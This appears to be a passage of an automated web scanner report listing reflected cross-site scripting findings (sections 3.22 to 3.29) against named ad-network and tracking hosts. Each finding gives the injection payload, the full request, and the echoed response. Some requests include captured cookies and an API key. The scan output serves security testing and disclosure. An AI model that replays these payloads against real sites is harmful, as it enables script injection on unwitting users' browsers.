43Y0dEPEFCUIwxuGIpeD+g351hGAFhi0NBE+GqKdjw/aKnLKFftBAw3ZtfGMQLskKAbJ1uA4hWdUkcbUur+n8vJ8KeaY9g+FEiPuysk3UB1EnShP2fO4dI8v8MySVDt/PgQB0SuruCEWgF1oALgpaM9ds+JdiTLxevJ2pKIpAN0TAu4vB7C9+oi8WGl3BFDWADMhB9tEqNLHj+QReqAbblTXO+0Fao4ngfgqrN2TQFWWaOptLA/dMSU2rJJJBd50TeuVH5PIRurXCB/HR+udAw7vZ111gu3we846cnq8NDUohC2mGKIo+MYUANfl7mp1EH9XRY4d7jSWKgqwSFifHcMdiCtT2fJWPdPvf9ott0sj0KAjqvglA2rXRWHEQsY8gh+30uSBg55yo6tLMlQkKts2L9S5Ye1k72Ehgu9xeLwYzfZsZ8xEExAOxLFrE0Snn+O4T1y3iueXECEKftTScXRzpCsyOdAzYhhg4ZTQtujB0mEPD+ELgknFRnQze8DWyOze471+OhcuVoIJUEpjLZbHrxnBqXYBCF5AzK46mfVZ7IY/OVAGlDDGhX1hJ5l6PJudk2D5zc3lCOpAJipzS7S2QnTOBhw6RhMM25pIpmfDDfh/CHU6sZh9LQFR+dgdYZdrbxH3P7wttjQDITcOSaGwHPt86LSHS4PFtBcqpwrGw8Y9ASmBFC5Y/1lvIGCdNhjDmYdy611TnhkKU3WLdh550O2NfVbB7SmXytkIw7EOJMPb7glUobNTFDf57WbY+hkCHaICapIfleMOMzsyXzWmm/r0lEiaiGWlZ6NAKyMzTRzJtSAJJuu8pInHFdzaPdXuCzod3/5ZAYdEo4kyreOwbSeIRuR80/PxHnv+pcUMMmBl9/sQTF7sptNbiMAmrqTX4wXKyLlfn0AZWo5xJ72ILnpIBNat7RXJ7aGJgrJbXgP9b2H3E4/4BNITDrOzrZrr4zm4r+wXAyllqsEeVFu7Az5ZARlmUo0nhL7DbexToJ7NTL6de4VIUXKoB7/OUEJN0CZT2LSez2G3Hgzz0ZZYVLvR2tXfSEmJkeYzwQhsGjPoV5Sjy8APp0TX20ySt6P0ygHXl0keELI3HTra5m7YTEXvH/nW3+wD8Q"

Response

3.22. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3538"><script>alert(1)</script>55ff45cada5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&d3538"><script>alert(1)</script>55ff45cada5=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:09:47 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 13:09:47 GMT
Pragma: no-cache
Content-Length: 5129
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=d96a784e%2d8901%2d47de%2d9dd1%2d4f91acb31514&d3538"><script>alert(1)</script>55ff45cada5=1&s=1948192&_salt=1427597960&t=2" target="_parent">
...[SNIP]...

3.23. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1facf"-alert(1)-"56c4e9b2457 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&1facf"-alert(1)-"56c4e9b2457=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:09:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 13:09:49 GMT
Pragma: no-cache
Content-Length: 5084
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?1facf"-alert(1)-"56c4e9b2457=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=d96a784e%2d8901%2d47de%2d9dd1%2d4f91acb31514&s=1948192&_salt=1037017033";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

3.24. http://ads.pointroll.com/PortalServe/ [dom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b036e"%3balert(1)//bff36772a4d was submitted in the dom parameter. This input was echoed as b036e";alert(1)//bff36772a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.comb036e"%3balert(1)//bff36772a4d&r=0.5130123335402459 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=A0A50400-0DFC-35A3-0209-123004DD0100; PRca=|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 13:13:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1299616' src='http://ads.pointroll.com/PortalServe/?pid=1299616Y09720110506203727&cid=1490553&pos=h&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic%3F$CTURL$&dom=http://www.cnbc.comb036e";alert(1)//bff36772a4d&time=4|7:46|-5&r=0.5130123335402459&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.25. http://ads.pointroll.com/PortalServe/ [flash parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85f36'%3balert(1)//264a26d5cec was submitted in the flash parameter. This input was echoed as 85f36';alert(1)//264a26d5cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1299616Y09720110506203727&flash=1085f36'%3balert(1)//264a26d5cec&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=A0A50400-0DFC-35A3-0209-123004DD0100; PRca=|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 13:13:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.cnbc.com/images/cnbc/iframebuster/PointRollAds.htm?pid=1299616Y09720110506203727&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic%3F$CTURL$&time=4|7:46|-5&flash=1085f36';alert(1)//264a26d5cec&server=portalserve&bu=2186916218');

3.26. http://ads.pointroll.com/PortalServe/ [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c274'-alert(1)-'b266cc6a7ec was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$7c274'-alert(1)-'b266cc6a7ec&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=A0A50400-0DFC-35A3-0209-123004DD0100; PRca=|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 13:13:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.cnbc.com/images/cnbc/iframebuster/PointRollAds.htm?pid=1299616Y09720110506203727&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic%3F$CTURL$7c274'-alert(1)-'b266cc6a7ec&time=4|7:46|-5&flash=10&server=portalserve&bu=675414772');

3.27. http://ads.pointroll.com/PortalServe/ [time parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb2fa'%3balert(1)//fa7adc45bd3 was submitted in the time parameter. This input was echoed as bb2fa';alert(1)//fa7adc45bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5bb2fa'%3balert(1)//fa7adc45bd3&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=A0A50400-0DFC-35A3-0209-123004DD0100; PRca=|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 13:13:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.cnbc.com/images/cnbc/iframebuster/PointRollAds.htm?pid=1299616Y09720110506203727&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic%3F$CTURL$&time=4|7:46|-5bb2fa';alert(1)//fa7adc45bd3&flash=10&server=portalserve&bu=1758231864');

3.28. http://adsfac.us/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 3df86<script>alert(1)</script>ea70e112e14 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=3df86<script>alert(1)</script>ea70e112e14&source=js&ord=2040463675 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308245114139&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=pctl=310521&pctc=30686&FQ=2&FM36572=1&FL310545=1&pctm=2&FL310521=1&FM30686=1&fpt=0%2C310545%2C310521%2C&pct%5Fdate=4174

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Thu, 16 Jun 2011 17:24:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS3df86%3Cscript%3Ealert%281%29%3C%2Fscript%3Eea70e112e140=uid=11727008; expires=Fri, 17-Jun-2011 17:25:16 GMT; path=/
Set-Cookie: FS3df86%3Cscript%3Ealert%281%29%3C%2Fscript%3Eea70e112e14=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4184&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Sat, 16-Jul-2011 17:25:16 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Thu, 16 Jun 2011 17:25:16 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=3df86<script>alert(1)</script>ea70e112e14.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

3.29. http://api.bizographics.com/v1/profile.json [&callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 8e311<script>alert(1)</script>7fac11f4bf5 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData8e311<script>alert(1)</script>7fac11f4bf5&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2